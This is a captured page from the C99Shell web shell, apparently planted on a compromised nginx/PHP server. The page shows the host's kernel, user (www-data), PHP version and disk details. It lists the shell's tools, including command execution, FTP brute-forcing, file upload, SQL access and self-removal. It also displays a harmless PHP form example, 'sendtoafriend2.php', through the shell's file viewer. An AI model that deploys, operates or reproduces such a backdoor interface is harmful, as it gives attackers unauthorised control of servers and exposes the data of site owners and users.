!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/wwwroot/frames/zebraforms/examples/   drwxrwxr-x
Free 83.24 GB of 96.73 GB (86.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     sendtoafriend2.php (3.47 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

    <head>

        <title>PHP HTML Form Processor Class - Send To A Friend</title>

        <style type="text/css"> body {font-family: tahoma, arial, verdana, sans; font-size: 12px; } </style>

    </head>

    <body>

    <p><strong>Quick tip: </strong>Don't worry that you don't have all the imaginable rules out of the box...Use the "custom" rule to create your owns!</p>

    <?php

     
        
require '../class.htmlform.php';

  
        
$form = new HTMLForm('form''post');
        
 
        
$form->add('label''label_name''name''Your name:');
   
        
$obj = & $form->add('text''name');
        
       
    
//    $obj->setRule(array('mandatory' => array('e1', 'The above field is required!')));

        // add a label to the 'email' control - used in the template file as {controls.label_email}
        
$form->add('label''label_email''name''Your email address:');

        
// add a text control named "email" - used in the template file as {controls.email}
        
$obj = & $form->add('text''email');

        
// set the field as mandatory
    //    $obj->setRule(array('mandatory' => array('e2', 'The above field is required!'), 'email' => array('e2', 'Invalid email address!')));

        // require a valid email address to be entered
      //  $obj->setRule(array('email' => array('e2', 'Address seems to be invalid!')));

        // add a label to the 'friends_name' control - used in the template file as {controls.label_friends_name}
        
$form->add('label''label_friends_name''friends_name''Your friend\'s name:');

        
// add a text control named "friends_name" - used in the template file as {controls.friends_name}
        
$obj = & $form->add('text''friends_name');

        
// set the field as mandatory
     //   $obj->setRule(array('mandatory' => array('e3', 'The above field is required!')));

        // add a label to the 'friends_email' control - used in the template file as {controls.label_friends_email}
        
$form->add('label''label_friends_email''friends_email''Your friend\'s email address:');

        
// add a text control named "friends_email" - used in the template file as {controls.friends_email}
        
$obj = & $form->add('text''friends_email');

        
// set the field as mandatory
     //   $obj->setRule(array('mandatory' => array('e4', 'The above field is required!'), 'email' => array('e4', 'Invalid email address!')));

        // require a valid email address to be entered
    //    $obj->setRule(array('email' => array('e4', 'Address seems to be invalid!')));

        // add a label to the 'message' control - used in the template file as {controls.label_message}
        
$form->add('label''label_message''message''Message:');

        
// add a text control named "message" - used in the template file as {controls.message}
        
$obj = & $form->add('textarea''message''', array('style' => 'width:200px;height:100px'));

        
// set the field as mandatory
    //    $obj->setRule(array('mandatory' => array('e5', 'The above field is required!')));
        
        
$form->add('submit''submit''Submit');

        
// validate the form
        
if ($form->validate()) {
        
            
// code if form is valid
            
print_r('Form is valid. Do your thing (write to db, send emails, whatever) and redirect.');

            die();
            
        }
        
      

        
$form->render();

    
?>

    </body>

</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0044 ]--